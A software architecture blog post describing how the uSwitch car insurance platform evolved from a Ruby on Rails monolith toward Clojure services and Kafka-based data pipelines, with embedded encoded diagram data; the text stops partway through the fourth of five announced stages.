'hello world'.scramble()
'hellO WORLd'
The possibilities are endless, but be warned that any time you muck around with the CPython internals at runtime, there are likely to be strange side-effects. This is definitely not code you should use for any purpose beyond simply having fun exploring the language.
If you're curious about other ways you can modify the CPython runtime, you might be interested in my post from two years ago, Why Python is Slow: Looking Under the Hood.
Now we have easy access to the dict version number, and you might wonder what can we do with this.
The answer is, currently, not so much. In the CPython source, the only time the version tag is referenced aside from its definition is in a unit test. Various Python optimization projects will in the future be able to use this feature to better optimize Python code, but to my knowledge none do yet (for example, here's a relevant Numba issue and FATpython discussion).
So for the time being, access to the dictionary version number is, as they say, purely academic. But I hope that some time in the near future, a web search will land someone on this page who will find this code useful in more than a purely academic sense.
Happy hacking! | http://nbviewer.jupyter.org/url/jakevdp.github.io/downloads/notebooks/DictVersion.ipynb | CC-MAIN-2018-30 | en | refinedweb |
2017-01-13 07:41 AM
Hello All
I know that snapmirrors are different in CDOT and since our NetApp expert who usually does these has moved on to a different company I am now have to do them. But alas here is my issue.
SVM-QA-02 has two different volumes on different aggerates HMG_DB and HMG_DG.
I need to snapmirror from DB to DG. Both volumes are online and running, but the Oracle DBA will stop the listeners for the data guard side to allow me to snapmirror to that DG side. I think this is what I do based on my knowledge of 7-mode
1. unmount DG volume from server
2. unmount from namespace
3. put DG volume in restricted mode
4. run on cluster snapmirror create -source-path svm-qa-02:hmg_db -destination-path svm-qa-02:hmg_dg -schedule 15_minute
5. run on cluster snapmirror initialize svm-qa-02:hmg_dg
6. mount in namespace
7. let snapmirror run every hour at :15 until DBA is ready for final sync/break
8. final sync/break and then mount on server again
Is that correct? Can it be done via the webui?
thanks
ed
2017-01-18 07:58 AM
Hi
What’s the propose of the SnapMirror?
if it's to migrate the data from one Aggregate to another - you would be glad to hear that there is a vol move command that does that for you - non disruptively.
Was that your goal ?
Gidi | https://community.netapp.com/t5/Data-ONTAP-Discussions/Snapmirror-in-CDOT/td-p/126978 | CC-MAIN-2018-30 | en | refinedweb |
Encrypting an Amazon S3 Bucket Object on the Server Using AWS KMS
The following example uses the
PutObject
method to add the object
myItem to the bucket
myBucket with server-side encryption set to AWS KMS.
Note that this differs from Setting Default Server-Side Encryption for an Amazon S3 Bucket, is in that case, the objects are encrypted without you having to explicitly perform the operation.
Choose
Copy to save the code locally.
Create the file encrypt_object_on_server.go.
Add the required packages.
import ( "github.com/aws/aws-sdk-go/aws" "github.com/aws/aws-sdk-go/aws/session" "github.com/aws/aws-sdk-go/service/s3" "fmt" "os" "strings" )
Get the KMS key from the command line,
where
key is a KMS key ID as created in the Creating a CMK in AWS Key Management Service example,
and set the bucket and object names.
if len(os.Args) != 2 { fmt.Println("You must supply a key") os.Exit(1) } key := os.Args[1] bucket := "myBucket" object := "myItem"
Create a session and Amazon S3 client.
sess := session.Must(session.NewSessionWithOptions(session.Options{ SharedConfigState: session.SharedConfigEnable, })) svc := s3.New(sess)
Create input for and call
put_object.
Notice that the
server_side_encryption property is set to
aws:kms,
indicating that Amazon S3 encrypts the object using AWS KMS,
and display a success message to the user.
input := &s3.PutObjectInput{ Body: strings.NewReader(object), Bucket: aws.String(bucket), Key: aws.String(object), ServerSideEncryption: aws.String("aws:kms"), SSEKMSKeyId: aws.String(key), } _, err := svc.PutObject(input) fmt.Println("Added object " + obj + " to bucket " + bucket + " with AWS KMS encryption")
See the complete example on GitHub. | https://docs.aws.amazon.com/sdk-for-go/v1/developer-guide/s3-example-server-side-encryption-with-kms.html | CC-MAIN-2018-30 | en | refinedweb |
This page shows how to migrate data stored in a ThirdPartyResource (TPR) to a CustomResourceDefinition (CRD).
Kubernetes does not automatically migrate existing TPRs. This is due to API changes introduced as part of graduating to beta under a new name and API group. Instead, both TPR and CRD are available and operate independently in Kubernetes 1.7. Users must migrate each TPR one by one to preserve their data before upgrading to Kubernetes 1.8.
The simplest way to migrate is to stop all clients that use a given TPR, then delete the TPR and start from scratch with a CRD. This page describes an optional process that eases the transition by migrating existing TPR data for you on a best-effort.
Rewrite the TPR definition
Clients that access the REST API for your custom resource should not need any changes. However, you will need to rewrite your TPR definition as a CRD.
Make sure you specify values for the CRD fields that match what the server used to fill in for you with TPR.
For example, if your ThirdPartyResource looks like this:
```yaml apiVersion: extensions/v1beta1 kind: ThirdPartyResource metadata: name: cron-tab.stable.example.com description: “A specification of a Pod to run on a cron style schedule” versions:
A matching CustomResourceDefinition could look like this:
apiVersion: apiextensions.k8s.io/v1beta1 kind: CustomResourceDefinition metadata: name: crontabs.stable.example.com spec: scope: Namespaced group: stable.example.com versions: - name: v1 served: true storage: true names: kind: CronTab plural: crontabs singular: crontab
Install the CustomResourceDefinition
While the source TPR is still active, install the matching CRD with
kubectl create.
Existing TPR data remains accessible because TPRs take precedence over CRDs when both try
to serve the same resource.
After you create the CRD, make sure the Established condition goes to True. You can check it with a command like this:
kubectl get crd -o 'custom-columns=NAME:{.metadata.name},ESTABLISHED:{.status.conditions[?(@.type=="Established")].status}'
The output should look like this:
NAME ESTABLISHED crontabs.stable.example.com True
Stop all clients that use the TPR
The API server attempts to prevent TPR data for the resource from changing while it copies objects to the CRD, but it can’t guarantee consistency in all cases, such as with multiple masters. Stopping clients, such as TPR-based custom controllers, helps to avoid inconsistencies in the copied data.
In addition, clients that watch TPR data do not receive any more events once the migration begins. You must restart them after the migration completes so they start watching CRD data instead.
Back up TPR data
In case the data migration fails, save a copy of existing data for the resource:
kubectl get crontabs --all-namespaces -o yaml > crontabs.yaml
You should also save a copy of the TPR definition if you don’t have one already:
kubectl get thirdpartyresource cron-tab.stable.example.com -o yaml --export > tpr.yaml
Delete the TPR definition
Normally, when you delete a TPR definition, the API server tries to clean up any objects stored in that resource. Because a matching CRD exists, the server copies objects to the CRD instead of deleting them.
kubectl delete thirdpartyresource cron-tab.stable.example.com
Verify the new CRD data
It can take up to 10 seconds for the TPR controller to notice when you delete the TPR definition and to initiate the migration. The TPR data remains accessible during this time.
Once the migration completes, the resource begins serving through the CRD. Check that all your objects were correctly copied:
kubectl get crontabs --all-namespaces -o yaml
If the copy failed, you can quickly revert to the set of objects that existed just before the migration by recreating the TPR definition:
kubectl create -f tpr.yaml
Restart clients
After verifying the CRD data, restart any clients you stopped before the migration, such as custom controllers and other watchers. These clients now access CRD data when they make requests on the same API endpoints that the TPR previously served. | https://kubernetes.io/docs/tasks/access-kubernetes-api/custom-resources/migrate-third-party-resource/ | CC-MAIN-2018-30 | en | refinedweb |
If/Else
Part of TutorialFundamentals
Description
Simple (yet effective) flow control.
Example
import std.stdio; void main() { int anInteger; if (anInteger == 0) writef("It's zero!"); else writef("It's not zero!"); }
Output
It's zero!
More Information
In D, all variable declarations that do not have a specific initializer get initialized with the value of their type's .init property. In this case, anInteger is of type int, and is assigned the value of int.init, which is zero.
To find out the initializer for other types, you may use the write function like so:
import std.stdio; void main() { writeln(int.init); writeln(float.init); }
Output
0 nan
For more information about .init and other properties, refer to the Properties documentation. | http://dsource.org/projects/tutorials/wiki/IfElseExample/D2 | CC-MAIN-2018-30 | en | refinedweb |
Copy pixel data from one buffer to another
#include <screen/screen.h>
int screen_blit(screen_context_t ctx, screen_buffer_t dst, screen_buffer_t src, const int *attribs)
Function Type: Delayed Execution
This function requests pixels from one buffer be copied to another. The operation isn't executed until an API function that flushes blits is called, or your application posts changes to one of the context's windows (screen_post_window()).
0 if successful, or -1 if an error occurred (errno is set; refer to errno.h for more details). | http://www.qnx.com/developers/docs/7.0.0/com.qnx.doc.screen/topic/screen_blit.html | CC-MAIN-2018-51 | en | refinedweb |
- FUNCTIONS
def distance_from_zero (num): return distance_from_zero if type(num) == int or type(num) == float: return abs(num) elif type (num): return abs(num) else: return 'nope'
Oops, try again. Your function seems to fail on input -10 when it returned '' instead of '10'
I have coded everything correctly but it is coming up with an error message. I have looked at all the forums and I can't find anything.
Please help me!!!!
Replace this line with your code. | https://discuss.codecademy.com/t/19-review-built-in-functions-please-help/73059 | CC-MAIN-2018-51 | en | refinedweb |
I do like the way I can treat lists in Python. It does any recursion solution to look easy and clean. For instance the typical problem of getting all the permutations of elements in a list, in Python looks like:
def permutation_recursion(numbers,sol):
if not numbers:
print "this is a permutation", sol
for i in range(len(numbers)):
permutation_recursion(numbers[:i] + numbers[i+1:], sol + [numbers[i]])
def get_permutations(numbers):
permutation_recursion(numbers,list())
if __name__ == "__main__":
get_permutations([1,2,3])
I do like the way I can simple get new instances of modified lists by doing things like
numbers[:i] + numbers[i+1:] or
sol + [numbers[i]]
If I try to code exactly the same in Java, it looks like:
import java.util.ArrayList;
import java.util.Arrays;
class rec {
static void permutation_recursion(ArrayList<Integer> numbers, ArrayList<Integer> sol) {
if (numbers.size() == 0)
System.out.println("permutation="+Arrays.toString(sol.toArray()));
for(int i=0;i<numbers.size();i++) {
int n = numbers.get(i);
ArrayList<Integer> remaining = new ArrayList<Integer>(numbers);
remaining.remove(i);
ArrayList<Integer> sol_rec = new ArrayList<Integer>(sol);
sol_rec.add(n);
permutation_recursion(remaining,sol_rec);
}
}
static void get_permutation(ArrayList<Integer> numbers) {
permutation_recursion(numbers,new ArrayList<Integer>());
}
public static void main(String args[]) {
Integer[] numbers = {1,2,3};
get_permutation(new ArrayList<Integer>(Arrays.asList(numbers)));
}
}
To create the same recursion I need to do :
ArrayList<Integer> remaining = new ArrayList<Integer>(numbers);
remaining.remove(i);
ArrayList<Integer> sol_rec = new ArrayList<Integer>(sol);
sol_rec.add(n);
Which is quite ugly and it gets worse for more complex solutions. Like in this example
So my question is ... are there any buil-in operators or helper functions in the Java API that would make this solution more "Pythonic" ?
No.
But this is why Martin Odersky created Scala. He's even said that one of his goals for Scala is that it be the Python of the Java world. Scala compiles to Java bytecode and easily interops with Java compiled classes.
If that's not an option, you could take a look at the Commons Collection Library.
You can use the
clone() function on Lists to get a shallow copy of them. That way you won’t have to instantiate a new Object yourself but can just use the copy.
ArrayList<Integer> remaining = remaining.clone().remove(i);
Other than that, no, java does not have such operators for Lists.
Apache Commons solves a lot of these kinds of issues. Have a look at ArrayUtils to do slicing. Java doesn't have a lot of syntactic sugar like scripting languages do for various reasons.
Different languages require different styles. Trying to accomplish
mylist[:i] + mylist[i+1:] in java is like using a hammer with a screw. Yes, you can do it, but it's not very tidy. I believe the equivalent might be something like
ArrayList temp = new ArrayList(list); temp.remove(index);
I believe the following accomplishes the same task, but does so in a slightly different fashion, but doesn't suffer readability issues. Instead of creating a new list, it modifies the list, passes it on, and returns the list to its previous state when the recursive call returns.
import java.util.Arrays; import java.util.List; import java.util.ArrayList; public class Permutation { public static void main(String[] args) { List<List<Integer>> result = permutations( Arrays.asList( new Integer[] {1,2,3})); for (List<Integer> permutation : result) { System.out.println(permutation); } } public static <T> List<List<T>> permutations(List<T> input) { List<List<T>> out = new ArrayList<List<T>>(); permutationsSlave(input, new ArrayList<T>(), out); return out; } public static <T> void permutationsSlave(List<T> input, ArrayList<T> permutation, List<List<T>> result) { if (input.size() == chosen.size()) { result.add(new ArrayList<T>(permutation)); return; } for (T obj : input) { if (!permutation.contains(obj)) { permutation.add(obj); permutationsSlave(input, permutation, result); permutation.remove(permutation.size()-1); } } } }
The python way may look easy and cleaner, but ability to look clean often hides the fact that the solution is quite inefficient (for each level of recursion it creates 5 new lists).
But then my own solution isn't terribly efficient either -- instead of creating multiple new objects it performs redundant comparisons (though some of this could be alleviated by use of accumulators).
Hi 1 you can use stack, which will be more handy.
2 the for loop can be written like this : for(Number n:numbers) | http://www.dlxedu.com/askdetail/3/b9854e1159808402be6910900f6effc9.html | CC-MAIN-2018-51 | en | refinedweb |
CURLOPT_NOSIGNAL explained
NAME
CURLOPT_NOSIGNAL - skip all signal handling
SYNOPSIS
#include <curl/curl.h>
CURLcode curl_easy_setopt(CURL *handle, CURLOPT_NOSIGNAL, long onoff);
DESCRIPTION
If. In addition, using CURLAUTH_NTLM_WB authentication could cause a SIGCHLD signal to be raised.
DEFAULT
AVAILABILITY
RETURN VALUE
Returns CURLE_OK if the option is supported, and CURLE_UNKNOWN_OPTION if not.
This HTML page was made with roffit. | https://curl.haxx.se/libcurl/c/CURLOPT_NOSIGNAL.html | CC-MAIN-2018-51 | en | refinedweb |
Is this an XML file?
I'm guessing that your text file contains XML markup tags. Maybe it's something else, though, like for mailing lists and form letters.
In Word online help I looked up "importing xml files" and got a bunch of hits. Here are instructions from one of them:
1. Place the insertion point where you want to insert the data.
2. On the Insert menu, click Field, and in the Field names box, click IncludeText.
3. In the Filename or URL box, type the name of the file, including its system path or URL.
4. Select the Namespace mappings check box, and type a namespace in the format xmlns:variable="namespace". For example, xmlns:a="resume-schema".
5. If you want to insert only a fragment of data rather than the whole file, select the XPath expression check box, and then type the XPath (XML Path Language (XPath): A language used to address parts of an XML document. XPath also provides basic facilities for manipulation of strings, numbers, and Booleans.) expression in the box provided. For example, a:Resume/a:Name specifies the Name element in the root element Resume.
6. If you want to use an Extensible Stylesheet Language Transformation (XSLT) (XSL Transformation (XSLT): A file that is used to transform XML documents into other types of documents, such as HTML or XML. It is designed for use as part of XSL.) to format the data, select the XSL Transformation check box, and type the name of the file, including its system path or URL.
7. Click OK.
Good luck.
using VB to generate word letters from txt files
This conversation is currently closed to new comments. | https://www.techrepublic.com/forums/discussions/using-vb-to-generate-word-letters-from-txt-files/ | CC-MAIN-2018-51 | en | refinedweb |
import "github.com/syncthing/syncthing/lib/signature"
Package signature provides simple methods to create and verify signatures in PEM format.
GenerateKeys returns a new key pair, with the private and public key encoded in PEM format.
Sign computes the hash of data and signs it with the private key, returning a signature in PEM format.
Verify computes the hash of data and compares it to the signature using the given public key. Returns nil if the signature is correct.
Package signature imports 11 packages (graph) and is imported by 4 packages. Updated 2017-10-07. Refresh now. Tools for package owners. | https://godoc.org/github.com/syncthing/syncthing/lib/signature | CC-MAIN-2018-51 | en | refinedweb |
Luca Grulla 2015-10-23T06:11:07+00:00 Luca Grulla Evolutionary Architecture and Microservices: a real world example 2015-07-01T00:00:00+00:00 <p><a href="">Microservices</a> have received a lot of attention over the last few years. As an architectural style it delivers a lof of benefits compared to a <a href="">Monolith application</a>, but there’s no doubt that it comes with the cost of a distributed system (such as discoverability, fault tolerance, data consistency just to name a few).</p> <p>I believe a Microservice architecture shouldn’t be your starting point. Instead, it should be the result of applying Evolutionary Architecture and <a href="">Domain Driven Design</a> principles to your system, balanced with a analysis of the maturity stage of your product (both from a business and technology perspectives).</p> <p>While building <a href="">uSwitch car insurance</a> we followed exactly these principles; since the beginning of the project until today we refined our architecture based on our increased understanding of the business needs, moving from a monolith by choice system to a well defined microservices architecture that keeps evolving and improving.</p> <p>If I look back at these 3 years I can identify five major stages:</p> <ol> <li><a href="#fast-development-cycle">Fast development cycle</a></li> <li><a href="#support-business-workflows">Support business workflows</a></li> <li><a href="#separation-of-concerns">Separation of concerns</a></li> <li><a href="#decouple-and-scalability">Decouple and scalability</a></li> <li><a href="#leverage-ecosystem">Leveraging uSwitch technology ecosystem</a></li> </ol> <h2><a name="fast-development-cycle"></a>Stage 1: Fast development cycle</h2> <p>We wanted to build a new product from scratch and we wanted to go live as soon as possible. Our first architecture was optimized to enable us to have a fast development cycle and the shortest path to production.</p> <p><img src="/assets/ArchitectureV1.1.png" style="border:0" alt="Architecture for fast development cycle"></p> <!-- <div class="mxgraph" style="position:relative;overflow:hidden;width:100%;"><div style="width:1px;height:1px;overflow:hidden;">3Vhdb+soEP01eWzl2IkTPzbddu9KW+lKlbbdR2KwjYpNhHE++us72ION4ySbarNN9+YhMgcY4JwZGBgF9/n2d0VW2ZOkTIx8j25HwW8j34+mE/g3wK4BQn/eAKnitIHGHfDM3xmCHqIVp6zsNdRSCs1XfTCWRcFi3cMSKXAINLYiqTXfAc8xEUP0hVOdNejcDzv8B+NpZocZh1FTU+qdtUFZQiqhb2oI6kx1TqwtnMjWs6tEAzsEwKYdq+j1eJcy7wGKlR1ZuF7eX39B1r0uS6koUz1I8OLNJTJ4AC2VlGDIfOXbeyaMnlaraRTPyTiaTWicRBM6v2nsPJ7bvF2dYgVO9t+aRI7XRFRIxwtbllyzgTRKVgVlxs54FCw2GbR5XpHY1G7AeQHLdC6wuuaXLOu+ppzLtVNSUhPtlHEOTGmGnn/OSjvKIXyYzJlWO+Md1r1QJAwdf4rlTeebfohY5vhlFDQYQWXT1nTHK3wgtWfSjDHg0AwkvIE7+QEq4DANtiBAobAoM7IyYCxkBaa/P+vTCG1Y1mezAetzhFzSQ+x2UdLHQ+duWcfxflHW7cqvwbrpe4z14pdi3VKKrAdTtPkVrM9p4ocw0XgSzMJoeWAfH1ANp5XhmXIFRz2X5oQsZWVm6vJaaiOWPcC/B9OB9ecTe7nd7i++le8zjSmZw/QfhWapIobTcuSHAkYHltfwmZpPCy0hAvoIjN1rtycYMGjwgTj3UkiTiBSyFjThQuxBRPDU6BsD4yZnWRg9OKRqd1iRc0rNMAejTELrRMgNIBm0Y9BhkUCY/sBZuB60YaWZo6n+C4qQiDUe0dRGdfn6/uPt5QJzTBzdSD3gPzbPu6j/4I7g+M+TLFI5UN/uhxToKbVUx9Q6Gbv/BZttqNl9L8JLicPmocTKYhdlE4d2TxQKtxIsSqUzmcqCiIcOBZezmaxxT4c/tuX61cC3Uyz9jY2AK7VzqkzR1DWsE6XvlKoDJhakLHls4UeIzZ4UZnafFAJWJytVS37Cn2C0lB2zU2+fQ0EVExCp6/6ELirP8IZ3AXnsdy1Op0cjzzh09YHqtv4nUxxWVN/hjOUzdYsrtW6vPZcS8cg17KSIzSF4DRVtwH9Kxh5v30zTa8pYXwWvouKBO89XqujN+ipO/sciNun1V6gIb4AxPIoFY+JNwniK7ztu+vD69OcZqaObhRmSP5UlCrJkYkHit7R2AZttwo0uqX+tGviQiON0L2X/lIEc9tWjKciNdzsLPTz7z+Yczf2UHMbtmsgkKUHofVHaUQ/pBMXuna9p3j3gBg8f</div></div> --> <p>Even if at the beginning of our journey we identified two separate concerns:</p> <ul> <li>serving the actual <a href="">website</a></li> <li>integration with multiple insurance APIs for real-time brokerage</li> </ul> <p>Although our experience was already suggesting that Microservices could be an excellent solution for the problems we were going to solve, we wanted a fast development cycle minimum friction between changes and access to production; we also didn’t want to get distracted in building solutions that won’t add much value for our Release 1. We explicitly chose to build a monolith <a href="">Ruby on Rails</a> application, with a well defined internal boundary between the web code and the integration layer.</p> <h2><a name="support-business-workflows"></a>Stage 2: Support business workflows</h2> <p>Once the new product went live sales reports from our partners started to flow in (mostly as CSV files over FTP). With sales data we started to identify KPIs and draw correlation between the web traffic, partner offers and the different conversion rates. We knew that the data aggregation and analysis could be done manually for a short time of period, but we had to automate the workflow before the volume was growing. We therefore introduced a new system responsible for sales data ingestion and for producing analytical dashboard.</p> <p><img src="/assets/ArchitectureV2.1.png" style="border:0" alt="Architecture for good support of the business flow"></p> <!-- <div class="mxgraph" style="position:relative;overflow:hidden;width:100%;"><div style="width:1px;height:1px;overflow:hidden;">3Vnfb+I4EP5reOwJEgjksfTa60q3Uk+sbu8eTewEqyZGjvnVv37HyZjYSUBUS6G7PKD4szO2v2/GHju98GG5+0uR1eKrpEz0gj7d9cI/e0EQj4bwb4B9BUTBpAIyxWkFDWpgxt8Ygn1E15yywmuopRSar3wwkXnOEu1hqRTYBRpbkcyar4FZQkQb/c6pXlToJIhq/JnxbGG7GURxVVPovbVBWUrWQt+VENSZ6iWxtnAgu76dJRrYIzDB8ork3pDepFx6FhQraq5wutyffk423itzqShTHiR4/uryGD6ClEpKMGSelrsHJoycVqpRnEzIIB4PaZLGQzq5q+w8ndv8QLBiOQ72Z00ixRsi1kjHdzYvuGYtZZRc55QZO4NeON0uoM1sRRJTuwXfBWyhlwKrS37JvHzXlJdy45SU1EQ7ZRwDU5qh458z05pyiB4ml0yrvXEO610oEkZOMMLytnbNIEJs4bhlHFYYQWWzg+maV3hAas+kGUPAoRlIeAV3CkJUwGEabEF8QmFaLMjKgImQazD9+VkfxWjDsj4et1ifIOSSHuFrFyV90HbuA+vY32/Kup35LVg37x5jPf+tWLeUIuvhCG1eg/UJTYMIBpoMw3EUzzvW8RbVsFsZnilXsNNzaXbIQq7NSF1eC23Esvv352A6tP58Yi23y/3Fl/Im05iROUx/yTXLFDGcFr0gEtA7sLyBx8w8WmgOEeAj0LfXriEYMGjwljgPUkiTiOSyFDTlQjQgInhm9E2AcZOzTI0eHDK1e6xYckpNN51RJqF1KuQWkAW0Y/DCNIUwfcZRuB60ZYUZo6n+F4qQh1UeUdXGZfn2/tNv5AI2T3QjtcN/bJ53Uf/BFcHxn68yz2RLfbseUqCn0FIdU+tk7H4Em4dQs+tejGcSh82uxMpiF2UTu3Z3FAqHEixKpRcykzkRjzUKLmczWeOeDn9sx/V/Bv5jhKX/sRFwpfZOlSmauop1ovS9UmXAJIIUBU8s/ASx6UlhRvdOIWB2cq1KyU/4E/SWsWN2yuWzLahiAiJ14w/oovK0D3gXkMc+l+LUelTyDCJXH6g+1L8wxWFG5RnOWD5Tt2StNodjz6VEPHIMOylitQneQkUb8O+S0ePtk2l6SxnLo+BNVOw481xTxf7YV3H4C4tYpdfXUHEckmE8IJACzydkTPF+x00fZnABB3ln/0ueQTIGaWDwdA8q7iHhA/hnbnE+5l7G3tlhjt5xLWMPUm72ML5E9tAkE/txc7H97J+/f51cbDj0c7F4dL1UrElmx0XWx+71jU3h+ivHkdj0Vo5Ol7vFwoFn4Y/MlMsaJ1OGUHcl+iTr/Tmq3SyBbg6ufdvw/O3byxlXBe6p25D8rlsBQeZMTEnympUeYG8X4AYvLX+nVjP8lIRdu1+PHJ06nfPoKncHyQNsC95Kh72drQAaf5EcBlE3kWlagOpNiQ5j6FINivVHnqp5/fEufPwB</div></div> --> <p>In order to give reliable visits to sales conversion rates the newly built dashboard had to have access to some web-centric data(such as number of unique visitors, number of completed journeys etc etc). We introduced a simple REST APIs on the web layer and use cron jobs to do scheduled data transfer from one system to another. This solution allowed us to move forward, and because it was flawed by choice (data duplication, poor resiliency) it forced us to think over time about what we really need in that space.</p> <h2><a name="separation-of-concerns"></a>Stage 3: Separation of concerns</h2> <p>It was time to move our architecture towards <a href="">SOA</a> to benefit from much clearly defined <a href="">bounded contexts</a>.</p> <p><img src="/assets/ArchitectureV3.1.png" style="border:0" alt="Architecture for separation of concerns"></p> <!-- <div class="mxgraph" style="position:relative;overflow:hidden;width:100%;"><div style="width:1px;height:1px;overflow:hidden;">7Vpfk9o2EP80PF7G8j/g8bhemnSa9jpkmvRR2MJ4zlhUFneQT5+VvcKyDT4C9sGlZRhAK7GW97e/1WrlgXO33Pwq6GrxiYcsGdhWuBk4vwxse+y58KkE20Lg26NCEIk4LESkFEzjbwyFFkrXcciyykDJeSLjVVUY8DRlgazI5jzBS6CyFY20+lIwDWjSlH6JQ7lAKfHHZccHFkcLvM7I9ouOTG61jpDN6TqRN7kI+lT3kmpdOJGNVTQ9vOIW28RH66xoWvnDN86XFYFgWWkrvN24evspfar8ZcZFyERFlMTpo2lH5x6gFJyDIvVrubljiYJTQ+X7PpmFrj0kjIQ+m90Uet4fO3xnYMFSnOy5KtHETzRZozm+sFkWS9ZARvB1GjKlhwycyfMCxkxXNFC9z+C7IFvIZYLduX3pLP+vai/5k9ESXFJptHEOTEiGjn/MnZYmB/YwvmRSbJVzoG/gnSFxXNsp2s+GZ/peIVsYTjlEbCkCG+00l2aFH2jZI62M1zas/DGVLBJUxjzNXtPU8zhJ7njCC0d25vkL5JkU/JEZPVb+gh6YZRgDCrov5Skom2QLGvJnaKsxfQDoOIjEVSCIcXgvSMoCBiCZpELeCpFbJ0holsWBFr8H859BERY2IvBL9oU587XIfaeF/zC3iB3Sk9v9IE42waCrcfKw3an9EWeDQR8+f34ANb9N//yjgQ24IdxMG0vgTZM4UstEABZUgX2i/DeG5ewWO5ZxGKo/TBI6Y8mEBo9RDvo+/pwY4HDdxaHmUtuCa+6LB/G4sd7ZloNLLmKi3VewBELOU9WH9uGE2h94DLMoh/D5PAM3qQO5m8Rp2GIWYGALBnwESGwH3dOAFnRB8oIRaKWEQcLXoPr6lyS/HtE0U4yINho2A5rfAtTJhMJLG0Yf2H6iWJOp7Mm0uf/vWqU0E0h32I2e2C0MIe47Z6xePhl5juWsNuVg+BWp7ymkh7DCWR/TiGUSeINXgQkXFyqGvfV0gzgYoRDbXdJrYGuPcQWrgNvHakXwhvZRSq8KPyWlHG3iS1CKtAQycPSfyOp644ZW93ScvojV8UKmaSFNmmKTC7ngEU9pcl9KwUoHkje2ieVX4/c/asg77/i0LliLp13Y6itra8/I3HE1FrmaJEes9Bpht7ZU1VUUCSP+66x0gIwCahNG3TkhM8u90emkwaKvn37/wRQv35R0nOJ1m8QVbtvE8NQUTWd/tYCoV4J+MziN2Q9xsMKU/gh5JRxs2xUdycFxbxxsGgCzl/8B7RLQGje9eu53AFAwCVUz0cNWakBeNdp/HU9XQGpT3RUFXxiv51X6UzGDzrzLadbDbsGXthCazyyG9VKI8nC6ugavi+tmIUrH/K5T+/rq2KzXfuJpxBtW0zllCMmg2nYpfr5gu6IEqCv3vW2UrFruqKOcYU1vT+7YRVWpbkzEtdvMsYhlOrLlPSnM0+hSzTzqXT7m7Sn/7fW4M/KUU8HBkpXp6dvpX81E8Go93R1W4wbRYfYCno5r15XskfryZjRcmzcfqJ327s3N0sADz2QEe5a349DOCDmpQ7de9C7g0L1s+s8I3fpUzPD08mDsBE/vfGPokmo0cscIplZRMKuRfL6oyKvPpb/SwCm7zDe9Xh+IIu2ndQf2Mb2HOF1q6BoeuwWfIXixgRCcfVmuoyUPTMRwV/lDG2+PsHCIV+EZHB+cRlgyrB3Q6rD9CrW8ZhKHx7Z307/feklvv/+3ncsSd1hdQTH9vopj2cbtNB/O6oTOwxY6E3hqp1M6szRsBmsQdhGqO2e841VLTPAQzmmMrytyX2+J1qcx/w3G5xRpfRIDKH85jkOzfBqxGF4+Zercfwc=</div></div> --> <!-- ORIGINAL The integration layer had been living at the boundary of the web system so far, but it was now time to pull it [Clojure](). The integration between the website and the new aggregation service was HTTP POST with JSON as data type. We also started understanding more of our analytics need: a [Postgres]() instance logically close the Integration layer became our analytics data source. --> <p>We knew from the very beginning that the integration layer and the websites were two different contexts; while one is responsible to collect and present information the other is responsible to communicate with the external partners and transform data between multiple representations. The integration layer had been encapsulated at the boundary of the web system so far, but it was now time to reify <a href="">Clojure</a>. The integration between the website and the new aggregation service was HTTP POST with JSON as data type. We also started understanding more of our analytics need: a <a href="">Postgres</a> instance logically close the Integration layer became our analytics data source.</p> <h2><a name="decouple-and-scalability"></a>Stage 4: Decouple and scalability</h2> <p>At this stage we had consistent traffic and sales to really benefit from a more mature data pipeline and analytics platform. REST style integrations brilliantly supported us until this point but we were at a stage where we wanted to increase system resiliency. uSwitch teams have been long time users of <a href="">Kafka</a>. Kafka is a distributed message system with an eye on message durability. We decoupled the integration layer from the analytics data store(the data transformation was a stateless service by definition anyway) with a set of Kafka topics and few workers. Now the integration layer was just publishing useful information to the topics, enabling multiple consumers to fetch data to support different needs.</p> <p><img src="/assets/ArchitectureV4.1.png" style="border:0" alt="Architecture for improved scalability"></p> <!-- <div class="mxgraph" style="position:relative;overflow:hidden;width:100%;"><div style="width:1px;height:1px;overflow:hidden;">7VrdkqI4FH6avpwp+RO9bHt7dmZ3e7e3nNqZvYwQkGokVsBunaefEziBQJB2FNSeXcuyzEkM8fvOP9xYd6vtr5yslw/Mp/GNOfK3N9YvN6Y5dWz4FIJdIRibk0IQ8sgvREYlmEffKApHKN1EPk1rCzPG4ixa14UeSxLqZTVZwGK8BG62JqHcvhLMPRLr0i+Rny1Raoyn1cRHGoVLvM7EHBcTabaTe/g0IJs4e5eLYE5Mr4jcCw+yHSEabjHe4Vi5UlL7wTfGVjUBp2mFFf7dqP73E/Jc+8mCcZ/ymiiOkicVR+seqOSMwUbi22p7R2NBp6TKmXoTYkxd2/eCqe1P3hX7fDh0eQkwpwke9tQtEeJnEm8Qji90kUYZ1ZjhbJP4VOxj3FizlyWsma+JJ2ZfQHdBtsxWMU7n+JJF/lsxXrFnZcRZRjJljGegPKOo+If80wpysB7KVjTjO6EcqBtoKGg4tmkV4xdFM8dOIVsqSukitwSJDcudK1jhCyJ7IMp4bQXlT0lGQ06yiCXpOaEOoji+YzErFNkK8hfI04yzJ6rMjPIXzMAp/QhYkHMJS2CzWbokPnuBsVgzBIGWhUxcBYPoh1tJEggohKQZ4dkt5zk6XkzSNPKk+APAf4KJUF/zwK/hC2dmG57rTof9w9lCum+fHPe9PJlGw9IcHPeKP/KsWNDHz58fYZvf5n/9qXEDagh/pstK4E3iKBRhwgMEhWOfCf2NIJzd4sQq8n3xg1lMFjSeEe8pzElvs58jHRzGXVyqhtoOXnNd3MvHu9F7c2RhIEROpPpyGoPLea7rUBtPuPsji+AU1RIWBCmoSZPI8hDHcYtZgMItAPgElJgWqqdCLewFyQt6oLUQejHbwNZvICQ1PZq0FMWjTTClUR3auIOoow0KFUQBfQ6JHMSi0ackpKmwiDeeARgQvlS4DRkYFLgtow3vIQKIoWdapZZLR/1Tark11eP22bTc0DOv38lTQDTAJcxLuiUhA+8/W1MewQHylB+lj5XoNR6GQNa2Zb2DkddFI1aQnZ5NnzGkqJUD46DPJ6azQwDnTOoqaU504BxcogInZf0Cp3ve24TEO0g9rhC6sY0WJJ3oVHeihsxaBlc68dt9TjT5qZyobI0g7I7MhC7hRGXhpUILhcgch4xnSwbekcT3lRRQ2lMe0W2UfVW+/yuWvHcOL5y8DX8uTWKouqi75rGnWI/ITE7GvANy6dKwGslgc4uiJMNf9Ztwm3o1+zqhNdiHY/dKCO0qYg8kVHrKcxCKp/+f0D4JbSSyTjOk7SEUICHiJHLZWizIQ3v7dRxZlzSOWvZwX1kvz1XpU3GCY7UL7jYspgs3IGRiByPTxpayGnS/Pvzxgz2XvEv